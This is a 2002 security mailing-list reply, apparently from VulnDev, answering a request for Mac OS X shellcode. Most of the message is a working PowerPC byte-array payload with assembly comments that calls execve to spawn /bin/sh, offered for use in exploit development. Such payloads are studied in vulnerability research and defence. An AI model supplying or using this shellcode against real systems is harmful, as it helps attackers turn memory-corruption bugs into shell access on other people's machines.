Re: OS X Shell Code

From: ghandi (ghandi@dopesquad.net)
Date: 01/11/02


Date: Thu, 10 Jan 2002 17:42:31 -0700 (MST)
From: ghandi <ghandi@dopesquad.net>
To: Josha Bronson <dmuz@slartibartfast.angrypacket.com>

Here is some shellcode that I wrote a while back. It was written and
tested on a G3 running OSX 10.0.x - 10.1.x. IIRC it worked fine on NetBSD
also (same syscall number for execve) and fine on Linux with a changed
system call number. The assembly language source and header files are
available at http://www.dopesquad.net/security.

/* PPC MacOS X (maybe others) shellcode
 *
 * ghandi <ghandi@mindless.com>
 */
char shellcode[] =
  "\x7c\xa5\x2a\x79" /* xor. r5, r5, r5 ; r5 = NULL */
  "\x40\xa2\xff\xfd" /* bnel shellcode */
  "\x7f\xe8\x02\xa6" /* mflr r31 */
  "\x3b\xff\x01\x30" /* addi r31, r31, 268+36 */
  "\x38\x7f\xfe\xf4" /* addi r3, r31, -268 ; r3 = path */
  "\x90\x61\xff\xf8" /* stw r3, -8(r1) ; argv[0] = path */
  "\x90\xa1\xff\xfc" /* stw r5, -4(r1) ; argv[1] = NULL */
  "\x38\x81\xff\xf8" /* subi r4, r1, 8 ; r4 = {path, 0} */
  "\x3b\xc0\x76\x01" /* li r30, 30209 */
  "\x7f\xc0\x4e\x70" /* srawi r0, r30, 9 */
  "\x44\xff\xff\x02" /* sc ; execve(r3, r4, r5) */
  "/bin/sh"
;

--
           ghandi / ghandi@mindless.com / www.dopesquad.net
       "Bein' Crazy is the least of my worries." - Jack Kerouac
          C439 2B06 D8D2 A2D8 1ABB  0A55 A61D 9057 63F5 9B1F

On Thu, 10 Jan 2002, Josha Bronson wrote:

> Greetings VulnDev,
>
> Anyone have some pointers (hah.. punny..) to shellcode examples for OS
> X?
>
> Thanks in advance,
> --
> Josha Bronson
> dmuz@angrypacket.com
> AngryPacket Security
